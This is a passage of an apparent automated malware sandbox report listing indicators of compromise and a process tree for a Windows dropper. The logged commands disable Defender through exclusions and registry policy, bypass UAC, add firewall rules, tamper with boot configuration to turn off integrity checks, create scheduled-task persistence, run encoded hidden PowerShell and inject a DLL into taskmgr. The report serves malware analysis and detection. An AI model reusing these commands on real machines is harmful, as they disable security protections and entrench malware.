0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	file.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	patch.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2016	powershell.exe
1980	rwoUTES6KWqKUfnaE76S2egL.exe
2112	reg.exe
2104	schtasks.exe
2104	schtasks.exe
2104	schtasks.exe
2104	schtasks.exe
2104	schtasks.exe
1580	rwoUTES6KWqKUfnaE76S2egL.exe
1580	rwoUTES6KWqKUfnaE76S2egL.exe
1580	rwoUTES6KWqKUfnaE76S2egL.exe
1580	rwoUTES6KWqKUfnaE76S2egL.exe
1580	rwoUTES6KWqKUfnaE76S2egL.exe
1872	nst98A9.tmp
1560	injector.exe
1560	injector.exe
1560	injector.exe
1560	injector.exe
1560	injector.exe
1560	injector.exe
1656	powershell.EXE
1560	injector.exe
1560	injector.exe
1560	injector.exe
1560	injector.exe
1560	injector.exe
1560	injector.exe
1560	injector.exe
1560	injector.exe
1560	injector.exe
1560	injector.exe
1656	powershell.EXE
1656	powershell.EXE
1560	injector.exe
1560	injector.exe
1560	injector.exe
1560	injector.exe
1560	injector.exe
1560	injector.exe
1560	injector.exe
1560	injector.exe
1560	injector.exe
1560	injector.exe
1560	injector.exe
1560	injector.exe
1560	injector.exe
1560	injector.exe
1560	injector.exe
1560	injector.exe
1560	injector.exe
1560	injector.exe
1560	injector.exe
1560	injector.exe
1560	injector.exe
1560	injector.exe
1560	injector.exe
1560	injector.exe
1560	injector.exe
1560	injector.exe
1560	injector.exe
1560	injector.exe
1560	injector.exe
1560	injector.exe
1560	injector.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
468	Process not Found

Suspicious use of AdjustPrivilegeToken 14 IoCs

description	pid	Process
Token: SeDebugPrivilege	2512	file.exe
Token: SeDebugPrivilege	1568	CasPol.exe
Token: SeDebugPrivilege	2016	powershell.exe
Token: SeDebugPrivilege	1980	rwoUTES6KWqKUfnaE76S2egL.exe
Token: SeImpersonatePrivilege	1980	rwoUTES6KWqKUfnaE76S2egL.exe
Token: SeDebugPrivilege	2112	reg.exe
Token: SeImpersonatePrivilege	2112	reg.exe
Token: SeSystemEnvironmentPrivilege	2904	csrss.exe
Token: SeDebugPrivilege	1656	powershell.EXE
Token: SeSecurityPrivilege	3016	sc.exe
Token: SeSecurityPrivilege	3016	sc.exe
Token: SeDebugPrivilege	2228	powershell.EXE
Token: SeDebugPrivilege	2680	powershell.EXE
Token: SeDebugPrivilege	1984	powershell.EXE

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2664	BroomSetup.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2512 wrote to memory of 2016	2512	file.exe	28
PID 2512 wrote to memory of 2016	2512	file.exe	28
PID 2512 wrote to memory of 2016	2512	file.exe	28
PID 2512 wrote to memory of 2016	2512	file.exe	28
PID 2512 wrote to memory of 1568	2512	file.exe	30
PID 2512 wrote to memory of 1568	2512	file.exe	30
PID 2512 wrote to memory of 1568	2512	file.exe	30
PID 2512 wrote to memory of 1568	2512	file.exe	30
PID 2512 wrote to memory of 1568	2512	file.exe	30
PID 2512 wrote to memory of 1568	2512	file.exe	30
PID 2512 wrote to memory of 1568	2512	file.exe	30
PID 2512 wrote to memory of 1568	2512	file.exe	30
PID 2512 wrote to memory of 1568	2512	file.exe	30
PID 1568 wrote to memory of 2112	1568	CasPol.exe	68
PID 1568 wrote to memory of 2112	1568	CasPol.exe	68
PID 1568 wrote to memory of 2112	1568	CasPol.exe	68
PID 1568 wrote to memory of 2112	1568	CasPol.exe	68
PID 1568 wrote to memory of 1980	1568	CasPol.exe	32
PID 1568 wrote to memory of 1980	1568	CasPol.exe	32
PID 1568 wrote to memory of 1980	1568	CasPol.exe	32
PID 1568 wrote to memory of 1980	1568	CasPol.exe	32
PID 1568 wrote to memory of 2860	1568	CasPol.exe	39
PID 1568 wrote to memory of 2860	1568	CasPol.exe	39
PID 1568 wrote to memory of 2860	1568	CasPol.exe	39
PID 1568 wrote to memory of 2860	1568	CasPol.exe	39
PID 1568 wrote to memory of 2308	1568	CasPol.exe	41
PID 1568 wrote to memory of 2308	1568	CasPol.exe	41
PID 1568 wrote to memory of 2308	1568	CasPol.exe	41
PID 1568 wrote to memory of 2308	1568	CasPol.exe	41
PID 1568 wrote to memory of 2308	1568	CasPol.exe	41
PID 1568 wrote to memory of 2308	1568	CasPol.exe	41
PID 1568 wrote to memory of 2308	1568	CasPol.exe	41
PID 1568 wrote to memory of 2760	1568	CasPol.exe	40
PID 1568 wrote to memory of 2760	1568	CasPol.exe	40
PID 1568 wrote to memory of 2760	1568	CasPol.exe	40
PID 1568 wrote to memory of 2760	1568	CasPol.exe	40
PID 1568 wrote to memory of 2760	1568	CasPol.exe	40
PID 1568 wrote to memory of 2760	1568	CasPol.exe	40
PID 1568 wrote to memory of 2760	1568	CasPol.exe	40
PID 2860 wrote to memory of 2664	2860	SAE8T4zcskbBA8RYtX1Q0I9g.exe	42
PID 2860 wrote to memory of 2664	2860	SAE8T4zcskbBA8RYtX1Q0I9g.exe	42
PID 2860 wrote to memory of 2664	2860	SAE8T4zcskbBA8RYtX1Q0I9g.exe	42
PID 2860 wrote to memory of 2664	2860	SAE8T4zcskbBA8RYtX1Q0I9g.exe	42
PID 2860 wrote to memory of 2664	2860	SAE8T4zcskbBA8RYtX1Q0I9g.exe	42
PID 2860 wrote to memory of 2664	2860	SAE8T4zcskbBA8RYtX1Q0I9g.exe	42
PID 2860 wrote to memory of 2664	2860	SAE8T4zcskbBA8RYtX1Q0I9g.exe	42
PID 1568 wrote to memory of 2684	1568	CasPol.exe	43
PID 1568 wrote to memory of 2684	1568	CasPol.exe	43
PID 1568 wrote to memory of 2684	1568	CasPol.exe	43
PID 1568 wrote to memory of 2684	1568	CasPol.exe	43
PID 2760 wrote to memory of 664	2760	Tg5hdahXvKii7G3w0MBRwS98.exe	45
PID 2760 wrote to memory of 664	2760	Tg5hdahXvKii7G3w0MBRwS98.exe	45
PID 2760 wrote to memory of 664	2760	Tg5hdahXvKii7G3w0MBRwS98.exe	45
PID 2760 wrote to memory of 664	2760	Tg5hdahXvKii7G3w0MBRwS98.exe	45
PID 2760 wrote to memory of 664	2760	Tg5hdahXvKii7G3w0MBRwS98.exe	45
PID 2760 wrote to memory of 664	2760	Tg5hdahXvKii7G3w0MBRwS98.exe	45
PID 2760 wrote to memory of 664	2760	Tg5hdahXvKii7G3w0MBRwS98.exe	45
PID 664 wrote to memory of 2952	664	Install.exe	70
PID 664 wrote to memory of 2952	664	Install.exe	70
PID 664 wrote to memory of 2952	664	Install.exe	70
PID 664 wrote to memory of 2952	664	Install.exe	70
PID 664 wrote to memory of 2952	664	Install.exe	70
PID 664 wrote to memory of 2952	664	Install.exe	70
PID 664 wrote to memory of 2952	664	Install.exe	70

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- UAC bypass
- Windows security bypass
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2512
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\file.exe" -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2016
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
  2⤵
  - Drops startup file
  - Loads dropped DLL
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1568
- - C:\Users\Admin\Pictures\KplGr0SP30DQu68lNKFMD8vo.exe
    "C:\Users\Admin\Pictures\KplGr0SP30DQu68lNKFMD8vo.exe"
    3⤵
    PID:2112
  - - C:\Users\Admin\Pictures\KplGr0SP30DQu68lNKFMD8vo.exe
      "C:\Users\Admin\Pictures\KplGr0SP30DQu68lNKFMD8vo.exe"
      4⤵
      PID:2104
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:2388
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        
        PID:2940
- - C:\Users\Admin\Pictures\rwoUTES6KWqKUfnaE76S2egL.exe
    "C:\Users\Admin\Pictures\rwoUTES6KWqKUfnaE76S2egL.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1980
  - - C:\Users\Admin\Pictures\rwoUTES6KWqKUfnaE76S2egL.exe
      "C:\Users\Admin\Pictures\rwoUTES6KWqKUfnaE76S2egL.exe"
      4⤵
      Windows security bypass
      Executes dropped EXE
      Loads dropped DLL
      Windows security modification
      Adds Run key to start application
      Checks for VirtualBox DLLs, possible anti-VM trick
      Drops file in Windows directory
      Suspicious behavior: EnumeratesProcesses
      PID:1580
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:1700
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        Modifies data under HKEY_USERS
        
        PID:568
    - - C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        5⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Loads dropped DLL
        Adds Run key to start application
        Manipulates WinMon driver.
        Manipulates WinMonFS driver.
        Drops file in Windows directory
        Modifies system certificate store
        Suspicious use of AdjustPrivilegeToken
        
        PID:2904
      - C:\Windows\system32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        6⤵
        
        PID:2208
      - C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
        
        "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Modifies system certificate store
        
        PID:2428
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:2388
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:1124
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:2848
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:3040
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:1008
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:2828
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:1468
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:2596
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:1988
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:2660
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:2916
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -timeout 0
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:1472
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:1940
      - C:\Windows\system32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        Creates scheduled task(s)
        
        PID:1788
      - C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:1560
      - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\Sysnative\bcdedit.exe /v
        6⤵
        Modifies boot configuration data using bcdedit
        
        PID:2668
      - C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
        6⤵
        Executes dropped EXE
        
        PID:2560
      - C:\Windows\system32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        Creates scheduled task(s)
        
        PID:1916
      - C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        6⤵
        Executes dropped EXE
        
        PID:2324
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        7⤵
        
        PID:2932
        
        C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        8⤵
        Launches sc.exe
        Suspicious use of AdjustPrivilegeToken
        
        PID:3016
- - C:\Users\Admin\Pictures\SAE8T4zcskbBA8RYtX1Q0I9g.exe
    "C:\Users\Admin\Pictures\SAE8T4zcskbBA8RYtX1Q0I9g.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2860
  - - C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
      C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:2664
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
        5⤵
        
        PID:1588
      - C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        6⤵
        
        PID:1544
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
        6⤵
        Creates scheduled task(s)
        
        PID:1076
  - - C:\Users\Admin\AppData\Local\Temp\nst98A9.tmp
      C:\Users\Admin\AppData\Local\Temp\nst98A9.tmp
      4⤵
      Executes dropped EXE
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      PID:1872
- - C:\Users\Admin\Pictures\Tg5hdahXvKii7G3w0MBRwS98.exe
    "C:\Users\Admin\Pictures\Tg5hdahXvKii7G3w0MBRwS98.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2760
  - - C:\Users\Admin\AppData\Local\Temp\7zS8B8D.tmp\Install.exe
      .\Install.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:664
    - - C:\Users\Admin\AppData\Local\Temp\7zS9369.tmp\Install.exe
        
        .\Install.exe /LzfYdidLoSR "385118" /S
        5⤵
        Checks BIOS information in registry
        Executes dropped EXE
        Loads dropped DLL
        Drops file in System32 directory
        Enumerates system info in registry
        
        PID:2952
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gKksfuzss" /SC once /ST 07:25:00 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        6⤵
        Creates scheduled task(s)
        
        PID:1608
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gKksfuzss"
        6⤵
        
        PID:892
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "gKksfuzss"
        6⤵
        
        PID:2944
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bmfUAJAHieefCXsdaD" /SC once /ST 19:09:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\mrTyqNDBdkhwJTRHw\nfxPIWAHevJCnXs\FJMmqgN.exe\" hp /Ilsite_idpRh 385118 /S" /V1 /F
        6⤵
        Windows security bypass
        Executes dropped EXE
        Adds Run key to start application
        Checks for VirtualBox DLLs, possible anti-VM trick
        Drops file in Windows directory
        Creates scheduled task(s)
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        
        PID:2104
- - C:\Users\Admin\Pictures\DGnWrGgR0Ahw3F41JyJBFq1d.exe
    "C:\Users\Admin\Pictures\DGnWrGgR0Ahw3F41JyJBFq1d.exe" --silent --allusers=0
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2308
- - C:\Users\Admin\Pictures\gbRaTzKO9iodoWeQTl3RFCKz.exe
    "C:\Users\Admin\Pictures\gbRaTzKO9iodoWeQTl3RFCKz.exe"
    3⤵
    - Executes dropped EXE
    PID:2684
- - C:\Users\Admin\Pictures\3MeQZSTnrtjerGqeUZehU4ni.exe
    "C:\Users\Admin\Pictures\3MeQZSTnrtjerGqeUZehU4ni.exe" PeJj3z5KgQO+REOMHfxRWZMfrERTkhHmRUWETPcQX9Iwim5oqDrINyf9NcQnEA==
    3⤵
    - Executes dropped EXE
    PID:1128

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240126190737.log C:\Windows\Logs\CBS\CbsPersist_20240126190737.cab
1⤵
- Drops file in Windows directory
PID:1000

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
1⤵
PID:1560
- C:\Windows\SysWOW64\cmd.exe
  /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
  2⤵
  PID:1924
- - \??\c:\windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
    3⤵
    PID:2836
- - \??\c:\windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2112

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
1⤵
PID:2036
- C:\Windows\SysWOW64\cmd.exe
  /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
  2⤵
  PID:792
- - \??\c:\windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2772
- - \??\c:\windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2816

C:\Windows\system32\taskeng.exe
taskeng.exe {4AD8BC91-77EA-4955-A23C-99F3E069C07C} S-1-5-21-2444714103-3190537498-3629098939-1000:DJLAPDMX\Admin:Interactive:[1]
1⤵
PID:2432
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
